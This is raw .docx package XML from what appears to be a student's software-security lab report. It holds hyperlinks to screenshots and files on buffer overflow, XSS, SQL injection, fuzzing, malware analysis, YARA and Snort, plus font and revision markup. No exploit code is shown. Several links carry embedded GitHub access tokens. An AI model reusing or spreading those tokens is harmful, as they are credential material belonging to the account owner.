Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/dynamic/Acquisizione%20schermata%2023.05.2023%20alle%2016.19.56%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/dynamic/Acquisizione%20schermata%2023.05.2023%20alle%2016.33.32%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/sysmon/Schermata%202023-07-02%20alle%2012.29.30.png" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/XSS/3.png" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/snort/Schermata%202023-07-05%20alle%2010.29.21.png" TargetMode="External"/><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hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.41.28.png" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/dynamic/key/Acquisizione%20schermata%2023.05.2023%20alle%2012.41.34%20%5B1%5D.png" TargetMode="External"/><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28.png"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/1%20Buffer-Overflow/Screen/fase4/Acquisizione%20schermata%2023.03.2023%20alle%2021.55.42%20%5B1%5D.png?token=GHSAT0AAAAAACAK7DHFXJHWPIB3KJ37GPDOZBG2CBQ" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/4%20StaticAnalysis/screen%20static%20analisys/Schermata%202023-06-30%20alle%2012.20.57.png" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.png"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image172.png"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image174.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.seedlabsqlinjection.com/defense/" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/3%20Fuzzing/screen%20fuzzing/Acquisizione%20schermata%2028.06.2023%20alle%2012.58.07%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/Astaroth/screen/Acquisizione%20schermata%2008.05.2023%20alle%2017.15.33%20%5B1%5D.png?token=GHSAT0AAAAAACB62EF5BZOF32NUWCPWOJHEZDSCRGA" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.30.15.png?token=GHSAT0AAAAAACB62EF44XWNGML2VDXA4JVYZEYHKKQ" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2012.02.40.png" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/1%20Buffer-Overflow/Screen/fase2/Acquisizione%20schermata%2021.03.2023%20alle%2019.15.42%20%5B1%5D.png?token=GHSAT0AAAAAACB62EF4XOVS2KDY6KDLNZY6ZFC53LQ" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image167.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/XSS/Worm/Acquisizione%20schermata%2003.04.2023%20alle%2012.50.31%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/4%20StaticAnalysis/file_static/6_memcpy_calls.ql" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/5%20Malware/Astaroth/fileCreati.zip" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.14.47.png?token=GHSAT0AAAAAACB62EF4UKWRCL237WIMZR5MZEYGU7Q" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image180.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/3%20Fuzzing/screen%20fuzzing/Acquisizione%20schermata%2028.06.2023%20alle%2011.26.28%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><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47.png"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/7%20Malware%20Detection/screen/Yara/Regole/Lab01.yar" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/snort/Schermata%202023-07-05%20alle%2010.13.50.png" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/XSS/2.png" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/snort/Schermata%202023-07-13%20alle%2011.07.16.png" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/screen%20sql%20inj/4/Acquisizione%20schermata%2027.04.2023%20alle%2016.36.58%20%5B1%5D.png?token=GHSAT0AAAAAACCSA73ABWD6DLYEKCTQGC7QZC6H6QA" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/dynamic/Acquisizione%20schermata%2023.05.2023%20alle%2016.32.24%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/dynamic/Acquisizione%20schermata%2023.05.2023%20alle%2016.34.21%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.png"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/7%20Malware%20Detection/screen/Yara/Regole/RegoleMie_Lab_01.yara" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/sysmon/Schermata%202023-07-02%20alle%2012.36.43.png" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/4%20StaticAnalysis/screen%20static%20analisys/Schermata%202023-06-29%20alle%2016.43.43.png" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/Astaroth/screen/Acquisizione%20schermata%2008.05.2023%20alle%2018.21.02%20%5B1%5D.png?token=GHSAT0AAAAAACB62EF4ITKYJFQXJ6PP5DPIZDSBOTA" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.54.03.png" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/snort/Schermata%202023-07-05%20alle%2010.34.52.png" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/dynamic/key/Acquisizione%20schermata%2023.05.2023%20alle%2012.51.40%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/Yara/Screen/Schermata%202023-07-01%20alle%2018.23.46.png" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image173.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/4%20StaticAnalysis/file_static/10_taint_tracking.ql" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image175.png"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/1%20Buffer-Overflow/gen_writeSecretPayload.py" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/3%20Fuzzing/screen%20fuzzing/Acquisizione%20schermata%2028.06.2023%20alle%2016.42.38%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/dynamic/key/Acquisizione%20schermata%2023.05.2023%20alle%2012.24.19%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.png"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image168.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image181.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/1%20Buffer-Overflow/payload_cyclic" TargetMode="Externa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hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/3%20Fuzzing/screen%20fuzzing/Acquisizione%20schermata%2028.06.2023%20alle%2011.29.43%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.png"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.png"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image176.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/2%20Web-Security/xss-elgg/malicius_ajax_request.html" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/fc6f1d23911eecd2deaab92bf8c9f9393259b67c/Laboratori/5%20Malware/Astaroth/screen/layer3.svg" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/dynamic/key/Acquisizione%20schermata%2023.05.2023%20alle%2012.54.33%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/tree/main/Laboratori/6%20Windows%20Malware/Screen" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/4%20StaticAnalysis/file_static/7_macro_invocations.ql" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image169.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/1%20Buffer-Overflow/Screen/fase1/Acquisizione%20schermata%2021.03.2023%20alle%2018.51.53%20%5B1%5D.png?token=GHSAT0AAAAAACAK7DHEH4N4YLD2BFTWA7FWZBEYXQA" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/screen%20sql%20inj/1%20e%202/Acquisizione%20schermata%2027.04.2023%20alle%2016.08.01%20%5B1%5D.png?token=GHSAT0AAAAAACCSA73A2PIQVNQFC34K27OWZC6G7XQ" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.23.25.png?token=GHSAT0AAAAAACB62EF4KFUJVC77R4FYXHKEZEYG26Q" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.practicalmalwareanalysis.com" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mgalateo/Software-Security-Labs/blob/main/Laboratori/4%20StaticAnalysis/file_static/3_function_definitions.ql" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.12.20.png" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image164.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/3%20Fuzzing/screen%20fuzzing/Acquisizione%20schermata%2028.06.2023%20alle%2011.39.55%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.svg"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.png"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image177.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/dynamic/Acquisizione%20schermata%2023.05.2023%20alle%2015.58.54%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.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image" Target="media/image152.png"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image182.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/screen%20sql%20inj/1%20e%202/Acquisizione%20schermata%2027.04.2023%20alle%2016.08.04%20%5B1%5D.png?token=GHSAT0AAAAAACCSA73AW7NWR6STZSXXBXO2ZC6HI4A" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId120" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto1.wdp"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/5%20Malware/screen%20basic%20malware/Schermata%202023-05-11%20alle%2011.38.36.png" TargetMode="External"/><Relationship Id="rId218"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_rels/header2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image185.png"/></Relationships>
</file>

<file path=word/_rels/header3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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33E2E5AEE4B5391A2415A29E1861A"/>
        <w:category>
          <w:name w:val="Generale"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{AF98FA0D-EBB2-4CD0-B8E7-FF58C2235FAD}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00CC5380" w:rsidRDefault="00D30D80" w:rsidP="00D30D80">
          <w:pPr>
            <w:pStyle w:val="57A33E2E5AEE4B5391A2415A29E1861A"/>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Calibri-Bold">
    <w:altName w:val="Calibri"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Calibri-BoldItalic">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80"/>
    <w:rsid w:val="00004C80"/>
    <w:rsid w:val="00052672"/>
    <w:rsid w:val="002A1A7C"/>
    <w:rsid w:val="003D71D8"/>
    <w:rsid w:val="00465C5F"/>
    <w:rsid w:val="00483BCE"/>
    <w:rsid w:val="00497D98"/>
    <w:rsid w:val="004F5354"/>
    <w:rsid w:val="00605591"/>
    <w:rsid w:val="00752544"/>
    <w:rsid w:val="007A114C"/>
    <w:rsid w:val="008E2ABC"/>
    <w:rsid w:val="00903A97"/>
    <w:rsid w:val="00996100"/>
